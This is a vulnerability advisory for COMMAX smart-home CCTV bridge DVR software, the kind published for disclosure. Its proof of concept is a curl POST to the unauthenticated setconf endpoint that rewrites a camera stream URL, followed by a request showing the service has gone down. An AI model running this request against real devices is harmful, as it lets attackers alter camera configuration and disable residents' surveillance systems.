COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS Vendor: COMMAX Co., Ltd. Prodcut web page: https://www.commax.com Affected version: n/a Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety. Desc: The application allows an unauthenticated attacker to change the configuration of the DVR arguments and/or cause denial-of-service scenario through the setconf endpoint. Tested on: GoAhead-Webs Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5666 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php 02.08.2021 -- #1 $ curl -X POST http://192.168.1.1:8086/goform/setconf --data"manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK" * Trying 192.168.1.1... * TCP_NODELAY set * Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0) > POST /goform/setconf HTTP/1.1 > Host: 192.168.1.1:8086 > User-Agent: curl/7.55.1 > Accept: */* > Content-Length: 257 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 257 out of 257 bytes * HTTP 1.0, assume close after body < HTTP/1.0 200 OK < Server: GoAhead-Webs < Pragma: no-cache < Cache-control: no-cache < Content-Type: text/html <

Completed to change configuration! Restart in 10 seconds
* Closing connection 0 #2 $ curl -v http://192.168.1.1:8086 * Rebuilt URL to: http://192.168.1.1:8086/ * Trying 192.168.1.1... * TCP_NODELAY set * connect to 192.168.1.1 port 8086 failed: Connection refused * Failed to connect to 192.168.1.1 port 8086: Connection refused * Closing connection 0 curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused